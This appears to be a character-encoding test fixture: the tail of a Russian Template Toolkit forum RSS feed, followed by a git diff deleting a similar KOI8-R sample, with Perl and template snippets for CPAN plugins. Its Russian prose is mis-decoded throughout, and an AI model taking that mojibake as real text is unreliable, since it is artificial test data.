http://forum.template-toolkit.ru/view_topic/topic_id-84.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - Sat, 7 May 2005 12:41:26 GMT - Template::Plugin::HTML::Prototype - ֵַ־ֱֳֵֹׁׂ Ajax-ֱִֻֿ ׳ ֱֲּֿ־ֱָ - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ <a target="_blank" href="http://backpan.cpan.org/authors/id/B/BA/BAUERB/Template-Plugin-HTML-Prototype-0.01.tar.gz">׳ֵׂ׃ֹׁ 0.01 ִֽֿױּׁ Template::Plugin::HTML::Prototype</a>. הֱ־־ ִֽֿױּ״ ׀ִֵֿׂ׃װֱ׳ֵּׁװ ֹ־װֵֵֶׂ׃ ֻ ִֽֿױְּ HTML::Prototype, ֻֿװֿׂ ׃ִֵֿׂײֹװ ֶױ־ֳֹֹֻ ִּׁ ֵַ־ֱֳֵֹֹׂ ֱִֻֿ <a target="_blank" href="http://prototype.conio.net/">Javascript-ֲֲֹֹּֿװֵֹֻ Prototype</a>. Prototype ֹ׃׀ּֿ״ױֵװ׃ׁ ׳ ֱ׃װ־ֿ׃װֹ ׳ <span style="font-weight:bold">Ruby on Rails</span> ֹ ׃ִֵֿׂײֹװ ֲֵֻֿװ־ֿ-ֵֹֿׂ־װֹֿׂ׳ֱ־־ױְ ְֱֱֳֵֹֹּׂ <span style="font-weight:bold">Ajax</span>.<br /><br /><div class="code"><pre> [% USE proto = HTML::Prototype %] - - [% proto.define_javascript_functions %] - [% proto.form_remote_tag(...) %] - [% proto.link_to_function(...) %] - [% proto.link_to_remote(...) %] - [% proto.observe_field(...) %] - [% proto.observe_form(...) %] - [% proto.periodically_call_remote(...) %] - [% proto.submit_to_remote(...) %]</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-81.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - Tue, 12 Apr 2005 12:23:30 GMT - Template::Multilingual - ׀ִִֵֿׂײֱֻ ־ֵ׃ֻּֿ״ָֹֻ ֻֿׁ׳ ׳ ֱֲּֿ־ֱָ - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CH/CHOLET/Template-Multilingual-0.02.tar.gz">׳ֵׂ׃ֹׁ 0.02 ִֽֿױּׁ Template::Multilingual</a>. װֿװ ִֽֿױּ״ ׁ׳ֵּׁװ׃ׁ ׀ֹֿׂ׳ִֿ־ֽ ֿװ Template ֹ ׀ֱֱִֵֵַּׂװ ְֱֱֳֵֹֹּׂ ׀ִִֵֿׂײֹֻ ־ֵ׃ֻּֿ״ָֹֻ ֻֿׁ׳ ׳ ֱֲּֿ־ֱָ.<br /><br />כִֿ:<br /><div class="code"><pre>use Template::Multilingual; -my $template = Template::Multilingual-&gt;new(); -$template-&gt;language('en'); -$template-&gt;process('example.ttml');</pre></div><br />ֱֲּֿ־:<br /><div class="code"><pre> -&lt;t&gt; - &lt;en&gt;Hello!&lt;/en&gt; - &lt;fr&gt;Bonjour!&lt;/fr&gt; - &lt;ru&gt;נֹׂ׳ֵװ!&lt;/ru&gt; -&lt;/t&gt;</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-75.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - Mon, 4 Apr 2005 06:03:55 GMT - Template::Plugin::TagRescue - ׀ֱַֹּ־ ִּׁ ׳ִֵֵּ־ֹׁ װֵַֿ׳ html ׃ ֹ׃ְֵֻּ־ֵֹֽ - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - ן׀ױֲֹֻּֿ׳ֱ־ֱ <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-TagRescue-0.06.tar.gz">׳ֵׂ׃ֹׁ 0.06 ִֽֿױּׁ Template::Plugin::TagRescue</a>. םִֿױּ״ ׳ִֵֵּׁװ ׀ֹׂ ׳׳ִֵֿ (װ.ֵ. ֱֵֽ־ֵׁװ &lt; &gt; &amp; &quot; ־ֱ ׃ֿֿװ׳ֵװ׃׳ױְֵֹ entities) װֵַֹ html ֱ ֹ׃ְֵֻּ־ֵֹֽ ױֱֱֻ־־ָ.<br /><br /><div class="code"><pre>[% USE TagRescue %] - -[% FILTER html_except_for('b') -%] -&lt;B&gt;צֹׂ־!&lt;/B&gt; and &lt;I&gt;כױׂ׃ֹ׳!&lt;/I&gt;&lt;BR&gt; -[%- END %] - -# ק׳ִֿ: -# &lt;B&gt;צֹׂ־!&lt;/B&gt; and &amp;lt;I&amp;gt;Italic!&amp;lt;/I&amp;gt;&amp;lt;BR&amp;gt; - -[% '&lt;B&gt;צֹׂ־!&lt;/B&gt; and &lt;I&gt;כױׂ׃ֹ׳!&lt;/I&gt;&lt;BR&gt;' | html_except_for('i','br') %] - -# ק׳ִֿ: -# &amp;lt;B&amp;gt;Bold!&amp;lt;/B&amp;gt; and &lt;I&gt;Italic!&lt;/I&gt;&lt;BR&gt; - -[% taglist = ['b', 'br']; '&lt;B&gt;צֹׂ־!&lt;/B&gt; ֹ &lt;I&gt;כױׂ׃ֹ׳!&lt;/I&gt;&lt;BR&gt;' | html_except_for(taglist) %] - -# ק׳ִֿ: -# &lt;B&gt;צֹׂ־!&lt;/B&gt; ֹ &amp;lt;I&amp;gt;כױׂ׃ֹ׳!&amp;lt;/I&amp;gt;&lt;BR&gt;</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-74.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - Tue, 29 Mar 2005 12:46:04 GMT - Template::Plugin::HTML::BBCode - ׀ֱֲֵֿֿׂׂ׳ֱ־ֵֹ BBCode ׳ HTML - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ <a target="_blank" href="http://backpan.cpan.org/authors/id/L/LI/LIOL/Template-Plugin-HTML-BBCode-0.01.tar.gz">׳ֵׂ׃ֹׁ 0.01 ִֽֿױּׁ Template::Plugin::HTML::BBCode</a>. םִֿױּ״ ׁ׳ֵּׁװ׃ׁ ֲֵֿׂװֻֿ ׳ֻֿׂױַ ִֽֿױּׁ HTML::BBCode ֹ ׀ִֵֿׂ׃װֱ׳ֵּׁװ ֶֹּ״װׂ bbcode, ֻֿװֿׂ ֱֵֽ־ֵׁװ װֵַֹ ֱֵֽׂװֹֻ BBCode ־ֱ ׃ֿֿװ׳ֵװ׃׳װױְֵֹ װֵַֹ HTML.<br /><br /><div class="code"><pre>[%- USE HTML::BBCode -%] -[% FILTER bbcode %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %] - -[%- USE HTML::BBCode( 'bbcode_limited' - allowed_tags = [ 'b', 'i', 'u' ] -) -%] -[% FILTER bbcode_limited %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %]</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-72.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - Sun, 27 Mar 2005 11:07:13 GMT - Template::Plugin::DBM::Deep - ֹ־װֵֵֶׂ׃ ֻ pure perl DBM - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ <a target="_blank" href="http://backpan.cpan.org/authors/id/M/ME/MERLYN/Template-Plugin-DBM-Deep-0.02.tar.gz">׳ֵׂ׃ֹׁ 0.02 ִֽֿױּׁ Template::Plugin::DBM::Deep</a>. םִֿױּ״ ׀ִֵֿׂ׃װֱ׳ֵּׁװ ֹ־װֵֵֶׂ׃ ֻ ִֽֿױְּ DBM::Deep.<br /><br /><div class="code"><pre> - [% USE db = DBM.Deep(file = &quot;my.db&quot; locking = 1 autoflush = 1); - db.lock; - db.flintstones = { &quot;flintstone&quot; = [&quot;fred&quot; &quot;wilma&quot;] - &quot;rubble&quot; = [&quot;barney&quot; &quot;betty&quot;] }; - db.castaways = [&quot;gilligan&quot; &quot;skipper&quot; &quot;professor&quot; &quot;and the rest&quot; ]; - db.unlock; - -%] - ... - [% db.flintstones.rubble.0; %] -- barney - [% db.castaways.3; %] -- and the rest -</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-71.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - Mon, 14 Mar 2005 12:35:02 GMT - ExtUtils::ModuleMaker::TT - ׀ִַֿֿװֿ׳ֱֻ ִֽֿױּׁ ֻ ִֹ׃װֲֹׂױֳֹֹ ֹ TT-ֱֲּֿ־ֿ׳ - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ <a target="_blank" href="http://backpan.cpan.org/authors/id/D/DA/DAGOLDEN/ExtUtils-ModuleMaker-TT-0.74.tar.gz">׳ֵׂ׃ֹׁ 0.74 ִֽֿױּׁ ExtUtils::ModuleMaker::TT</a>. םִֿױּ״ ׀ֿ׳ֵּֿׁװ ׃װֹֿׂװ״ ׃װֱ־ֱִׂװ־ֵ ֱֶּ, ׳ִֵָֹֿׁ ׳ ׃ֿ׃װֱ׳ ִֹ׃װֲֹׂױװֹ׳ֱ ִֽֿױּׁ (README, Changes, Todo, Build.PL, Makefile.PL, Proxy_Makefile.PL, MANIFEST.SKIP, test.t, module.pm), ֹ ֱֲּֿ־ֿ׳ TT. - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-68.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - Mon, 14 Mar 2005 12:21:55 GMT - Template::Plugin::String::Compare - ׃ֱׂ׳־ֵ־ֵֹ ׃װֻֿׂ - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-String-Compare-0.01.tar.gz">׳ֵׂ׃ֹׁ 0.01 ׀ֱַֹּ־ֱ Template::Plugin::String::Compare</a>, ֻֿװֿׂ ׀ֿ׳ֵּֿׁװ ׃ֱׂ׳־ֹ׳ֱװ״ ׃װֹֻֿׂ ׳ ׃װֻֿֿׂ׳ֽֿ ֻֿ־װֵֻ׃װֵ.<br /><br /><div class="code"><pre> -[% IF '2005-03-01' &lt; '2005-04-01' %] -פֱֵֻֿ ׃ֱׂ׳־ֵ־ֵֹ ׀ֿׂ׳ִֹֿװ׃ׁ ׳ ֹ׃ּֿ׳ֽֿ ֻֿ־װֵֻ׃װֵ. -[% END %] - -[% USE String.Compare %] -[% IF String.Compare.new('2005-03-01') &lt; '2005-04-01' %] -װֿ ׃ֱׂ׳־ֵ־ֵֹ ׀ֹֿׂ׃ִָֹֿװ ׳ ׃װֻֿֿׂ׳ֽֿ ֻֿ־װֵֻ׃װֵ. -[% END %] -</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-67.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - Sat, 19 Feb 2005 08:23:15 GMT - ףֱִֵׂ ִּׁ ֱֱֲֿׂׂװֹֻ eCommerece ׀ֹּֿׂײֵ־ֹ Handel - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CL/CLACO/Handel-0.04.tar.gz">ִֽֿױּ״ Handel (׳ֵׂ׃ֹׁ 0.04)</a>. װֿװ ִֽֿױּ״ ׀ִֵֿׂ׃װֱ׳ֵּׁװ ׃ִֵׂױ ִּׁ ֱֱֲֿׂׂװֹֻ eCommerece ׀ֹּֿׂײֵ־ֹ ׃ ׀ִִֵֿׂײֻֿ AxKit ֹ Template Toolkit. - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-63.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - Thu, 17 Feb 2005 07:27:20 GMT - Template::Plugin::SSI - ֹ׃׀ּֿ״ֿ׳ֱ־ֵֹ SSI ׳ ֱֲּֿ־ֱָ - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CO/COREY/Template-Plugin-SSI-0.11.tar.gz">׳ֵׂ׃ֹׁ 0.11 Template::Plugin::SSI</a>. םִֿױּ״ ׁ׳ֵּׁװ׃ׁ ֲֵֿׂװֻֿ ׳ֻֿׂױַ CGI::SSI ֹ ׀ֿ׳ֵּֿׁװ ֹ׃׀ּֿ״ֿ׳ֱװ״ ׳ ֱֲּֿ־ֱָ SSI-ִֵֹֻׂװֹ׳.<br /><br /><div class="code"><pre>[% USE SSI %] - -# ׳ְֵֻּ־ֵֹ (virtual) ֱֱֶּ /foo/bar.inc.html -[% SSI.include('virtual', '/foo/bar.inc.html') %] - -# ׳ְֵֻּ־ֵֹ ֱֱֶּ /foo/bar.inc.html -[% SSI.include('file', '/var/www/html/foo/bar.inc.html') %] - -# ׳׀ּֿ־ֹװ״ ֱֻֽֿ־ִױ -[% SSI.exec('cmd', 'ls') %] - -# ׳׀ּֿ־ֹװ״ cgi ׃ֹֻׂ׀װ -[% SSI.exec('cgi', '/cgi-bin/foo.cgi') %] - -# ױ׃װֱ־ֿ׳ֹװ״ ׀ֵֵֵֽׂ־־ױְ ֻֿ־ֶַֹױֱֳֹֹׂ ('sizefmt', 'timefmt', ֹֹּ 'errmsg') -[% SSI.config('timefmt', &quot;%Y&quot;) %] - -# ׳׳ֵ׃װֹ ־ֱֲֿׂ ׀ֵֵֵֽׂ־־ױְ ֻֿׂױײֵ־ֹׁ -[% SSI.echo('DATE_LOCAL') %] - -# ױ׃װֱ־ֿ׳ֹװ״ ֱֻּּֿ״־ױְ ׀ֵֵֵֽׂ־־ױְ ($name = 'Corey') -[% SSI.set('name', 'Corey') %] - -# ׳׳ֵ׃װֹ ֱִװױ ׀ֿ׃ִֵּ־ֵ ֱֳִֶֹֹֹֹֻֽֿ 'index.html' -[% SSI.flastmod('file', 'index.html') %] - -# ׳׳ֵ׃װֹ ֱֵֽׂׂ ֱֱֶּ 'index.html' -[% SSI.fsize('file', 'index.html') %]</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-62.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - - - diff --git a/chardet/tests/KOI8-R/forum.template-toolkit.ru.8.xml b/chardet/tests/KOI8-R/forum.template-toolkit.ru.8.xml deleted file mode 100644 index fa5d42f..0000000 --- a/chardet/tests/KOI8-R/forum.template-toolkit.ru.8.xml +++ /dev/null @@ -1,228 +0,0 @@ - - - - - זֿׂױֽ Template Toolkit : גֲֹֹּֿװֵֹֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_forum/forum_id-8.html?rss - Template Toolkit - ֲ׃װֱׁׂ, ֽֿ־ֱׁ ֹ ֱׂ׃ֱֵֹֽׁׁׂ ׃ֹ׃װֱֵֽ ֱֲֲֿֿׂװֹֻ ֱֲּֿ־ֿ׳. מֱ ׃ֱװֵ ֱֲֿׂװֱֵװ ֶֿׂױֽ, ׳ ֻֿװֽֿֿׂ ֲֿ׃ױײְֱִװ׃ׁ ׳ֿ׀ֿׂ׃ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ ֲֲֹֹּֿװֵֹֻ ׀ֿ ֱֲֿׂװֵ ׃ ֱֲּֿ־ֱֹֽ. Text::Template, HTML::Template, Mason ֹ ִׂױֵַֹ ֲֲֹֹּֿװֵֹֻ - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Thu, 17 Mar 2005 12:03:32 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ֱֲּֿ־ ׳ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - Tue, 28 Dec 2004 19:07:19 GMT - עֱִֵֵּ־ֵֹ ֱִֻֿ, ׀ִֵׂ׃װֱ׳ֵּ־ֹׁ, ֹ ֻֿ־ֶַֹױֱֳֹֹׂ - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - מֱ <a target="_blank" href="http://www.theperlreview.com/">Perl Review</a> ֿ׀ױֲֹֻּֿ׳ֱ־ֱ ׃װֱװ״ׁ גֱֱׂ־ֱ ִֵ זֿׁ (brian d foy) &quot;Separating Code, Presentation, and Configuration&quot;. מֹײֵ ׀ֹׂ׳ִֹֿװ׃ׁ ׀ֵֵׂ׳ִֿ ׃װֱװ״ֹ.<br /><br /><span style="font-weight:bold">כֱׂװֹֻ ֲֿֿׂ.</span><br /><br />ס ׳ּׁ ׀ֱַֽֽֿׂׂױ ֹ ׀ִִֵׂױֵ ׃װֱװ״ֹ ֹ ֱִֵֹּּׂ ִֻֿ, ׀ִֵׂ׃װֱ׳ֵּ־ֵֹ ֹ ֻֿ־ֶַֹױְֱֳֹׂ, װֲֿ ׃ֱִֵּװ״ ׀ֱַֽֽֿׂׂױ ֲֵֵּֿ ֲַֹֻֿ ֹ ֵַֻּֿ ִּׁ ׀ִִֵֿׂײֹֻ.<br /><br /><span style="font-weight:bold">1. ק׳ִֵֵ־ֵֹ.</span><br /><br />ק ׀ֿ׃ִֵּ־ֵֽ ׳׀ױ׃ֵֻ ׁ ׀ִֵׂ׃װֱ׳ֹּ ׀ֱַֽֽֿׂׂױ, ֻֿװֿׂױְ ׁ ֹ׃׀ּֿ״ױְ ִּׁ װַֿֿ, װֲֿ ֱֱֲֹׂװ״ ֹ ֿװֱֲֿׂײֱװ״ Rich Site Summaries (RSS) ׃ ִׂױַָֹ ׳ֲֵ-׃ֱװֿ׳<span style="font-weight:bold"><sup>1</sup></span>. ק ִֵֻֿ ׁ ֹ׃׀ּֿ״ֿ׳ֱּ ֹּװֱֵּׂ״־ֵ ׳ֵֹֹּ־, װֲֿ ױֱֱֻװ״ ֱֵֹֻֻ ֱֶּ ֱַׂױײֱװ״ ֹ ֱֻֻ ׀ִֵׂ׃װֱ׳ּׁװ״ ֱִ־־ֵ, ֹ ֱֲֵּֿ װֿ ׳ װֽֿ ׳׀ױ׃ֵֻ ׁ װֿ ֹ׃׀ֱׂ׳ְּ.<br /><br /><span style="font-style:italic">לֹ׃װֹ־ַ 1</span> ׃ִֵֿׂײֹװ ׀ֱַֽֽֿׂׂױ, ֻֿװֿׂױְ ׁ ׀ִֵׂ׃װֱ׳ּּׁ ׳ ׀ִִֵׂױֵֽ ׳׀ױ׃ֵֻ. ק ֱֽ׃׃ֹ׳ֵ <span style="font-weight:bold">@files</span> ֱָׂ־ׁװ׃ׁ ֱֶּ, ֻֿװֵֿׂ ־ֲִֵָֹֽֿֿֿ ֱַׂױֹװ״, <span style="font-weight:bold">$base</span> - ֱֻװֱַּֿ, ִֵַ ׃ֱָֿׂ־ֵׁװ׃ׁ ׳׳ִֿ, ֹ ־ֵ׃ֻּֿ״ֻֿ ׳ֱׂײֵ־ֹ <span style="font-weight:bold">print</span> ׃ְֱִֿװ HTML ׃ ׀ִֿ׃װֱ־ֿ׳ֻֿ ׀ֿׂ׃װָ ׀ֵֵֵֽׂ־־ָ (װֿ ׀ִֵׂ׀ֿװֹװֵּ״־ֵֵ ׃ֱֻײֵֽ ֵֽ ֹ׃׀ּֿ״ֿ׳ֱװ״ HTML-ֶױ־ֳֹֹֻ ִֽֿױּׁ CGI). װֿ ־ֲֵַֹֹֻ ֹ װׂױִ־ ִּׁ ׃ֿ׀ֿׂ׳ֿײִֵ־ֹׁ ִֻֿ. כֱִַֿ ׁ ֱָֿױ ׀ֵֽֿ־ׁװ״ ׃׀ֹ׃ֻֿ ׃ֱװֿ׳ ֹֹּ ׳׳ִֿ, ׁ ֹׂ׃ֻױְ ׃ֱּֽֿװ״ ׀ֱַֽֽֿׂׂױ, ֵ׃ֹּ ־ֱֲֵׂױ װֿ-װֿ ־ֵ׀ֱׂ׳ֹּ״־ֿ ֹֹּ ׃ְֱִֵּ ִׂױַױְ ֲֹֻֿױ.<br /><br /><span style="font-style:italic">לֹ׃װֹ־ַ 1: תֱַׂױֹֻ RSS ׃ ײֵ׃װֻֿ׀ֿׂ׀ֹ׃ֱ־־ֹֽ ־ֱֵ־ֹֹֽׁ.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use XML::RSS; -6 -7 my @files = qw( -8 http://use.perl.org/useperl.rss -9 http://search.cpan.org/rss/search.rss -10 http://jobs.perl.org/rss/standard.rss -11 http://www.perl.com/pace/perlnews.rdf -12 http://www.perlfoundation.org/perl-foundation.rdf -13 http://www.stonehenge.com/merlyn/UnixReview/ur.rss -14 http://www.stonehenge.com/merlyn/WebTechniques/wt.rss -15 http://www.stonehenge.com/merlyn/LinuxMag/lm.rss -16 ); -17 -18 my $base = '/usr/home/comdog/TPR/rss-html'; -19 -20 foreach my $url ( @files ) -21 { -22 my $file = $url; -23 -24 $file =~ s|.*/||; -25 -26 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -27 -28 unless( $result ) -29 { -30 warn &quot;Could not open [$file] for writing! $!&quot;; -31 next; -32 } -33 -34 select $fh; -35 -36 my $rss = XML::RSS-&gt;new(); -37 my $data = get( $url ); -38 $rss-&gt;parse( $data ); -39 -40 my $channel = $rss-&gt;{channel}; -41 my $image = $rss-&gt;{image}; -42 -43 print &lt;&lt;&quot;HTML&quot;; -44 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -45 &lt;table cellpadding=5&gt; -46 &lt;tr&gt;&lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -47 HTML -48 -49 if( $image-&gt;{url} ) -50 { -51 my $img = qq|&lt;img src=&quot;$$image{url}&quot; alt=&quot;$$channel{title}&quot;&gt;|; -52 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$img&lt;/a&gt;&lt;br&gt;\n|; -53 } -54 else -55 { -56 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$$channel{title}&lt;/a&gt;&lt;br&gt;\n|; -57 } -58 -59 print &lt;&lt;&quot;HTML&quot;; -60 &lt;font size=&quot;-1&quot;&gt;$$channel{description}&lt;/font&gt; -61 &lt;/td&gt;&lt;/tr&gt; -62 &lt;tr&gt;&lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -63 HTML -64 -65 foreach my $item ( @{ $rss-&gt;{items} } ) -66 { -67 print qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -68 } -69 -70 print &lt;&lt;&quot;HTML&quot;; -71 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt; -72 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -73 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -74 HTML -75 -76 close $fh; -77 }</pre></div><br /><br /><span style="font-weight:bold">2. ןװִֵֵּ־ֵֹ ׀ִֵׂ׃װֱ׳ֵּ־ֹׁ.</span><br /><br />טֹֿֿׂ ֱִֹ־ ־ֵ ׃׳ׁ׳ֱֵװ ׃ֲֵׁ ׃ ֱ׃װ־ֽ ׀ִֵׂ׃װֱ׳ֵּ־ֵֹֽ ֱִ־־ָ. םֿׁ ׀ֱֱַֽֽֿׂׂ ִּֿײ־ֱ ֱֱֲׂװ״ ֱִ־־ֵ ֹ ׃ֱִֵּװ״ ָֹ ִֿ׃װױ׀־ֹֽ ֵֽױ-װֿ, װֿ ָֹ ׀ִֵׂ׃װֱ׳ֵּׁװ - װֿ, װֿ ׁ ֱֲֿׂװְֱ ׃ RSS ־ֵ ִּֿײ־ֿ ֵֹֽװ״ ־ֱֵ־ֹׁ. ס ַֽֿױ ֱָֿװֵװ״ ׀ֹֿׂ׳ִֹֿװ״ HTML, TeX, ׀ֿׂ׃װֿ װֵֻ׃װ, ֹֹּ ֱִײֵ ֱֻֻֿ-װֿ ֱֶֽֿׂװ, ֻֿװֿׂ ־ֵ ַֽֿױ ׃ֲֵֵ ׀ִֵׂ׃װֱ׳ֹװ״.<br /><br />קֽֿֿײ־ֿ ֻװֿ-װֿ ֱֵָֿװ ־ֱ׀ֹ׃ֱװ״ ׃ֲֿ׃װ׳ֵ־־ױְ ׃ֹ׃װֵֽױ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ, ־ֿ ֽ־ֵ ־ֱׂ׳ֹװ׃ׁ ִֽֿױּ״ Text::Template םֱֱֻׂ-הײֵ׃ֿ־ֱ הֹֽֿ־ױ׃ֱ (Mark-Jason Dominus). ן־ ֱִֵֵּװ ׳׃ֵ װֿ ֽ־ֵ ־ֲִֵָֹֽֿֿֿ, ־ֵ װֲֵׂױֵװ ִּׁ ׃׳ֵֿ ֱֲֿׂװ ִֿ׀ּֿ־ֹװֵּ״־ָ ׀ֱַֽֽֿׂׂ ֹ ־ֱ׀ֹ׃ֱ־ ׀ּֿ־ֿ׃װ״ְ ־ֱ Perl. ץ ־ֵַֿ ׀ֿׂ׃װֿ ֹ־װֵֵֶׂ׃ ֹ ֽ־ֵ ־ֵ װֲֵׂױֵװ׃ׁ ֹױֱװ״ ֻׁ ֱֲּֿ־ֿ׳, ׀ֿ׃ֻּֿ״ֻױ ֱֲּֿ־ ֹ׃׀ּֿ״ױְװ Perl.<br /><br /><span style="font-style:italic">לֹ׃װֹ־ַ 2</span> - װֿ װֱ ײֵ ׀ֱֱַֽֽֿׂׂ, װּֿ״ֻֿ ׳ֵֽ׃װֿ ׳־ִֵֵׂ־־ַֿֿ HTML ֹ׃׀ּֿ״ױֵװ׃ׁ Text::Template. ק ׃װֵֻֿׂ 5 ׁ ֹֽ׀ֿׂװֹׂױְ ֵֽװִֿ fill_in_file(). ק ׃װֵֻֿׂ 13 ױֱֻ׳ְֱ ֱֲּֿ־, ֻֿװֿׂ ֲױִױ ֹ׃׀ּֿ״ֿ׳ֱװ״. קֵ׃״ HTML, ֹ׃׀ּֿ״ױֵֽ ׀ֱַֽֽֿֿׂׂ, װֵ׀ֵׂ״ ׳־ֵ׃ֵ־ ׳ ֱֶּ ֱֲּֿ־ֱ, ׀ֹׂ׳ִֵֵ־־ ׳ <span style="font-style:italic">ֹּ׃װֹ־ֵַ 3</span>.<br /><br 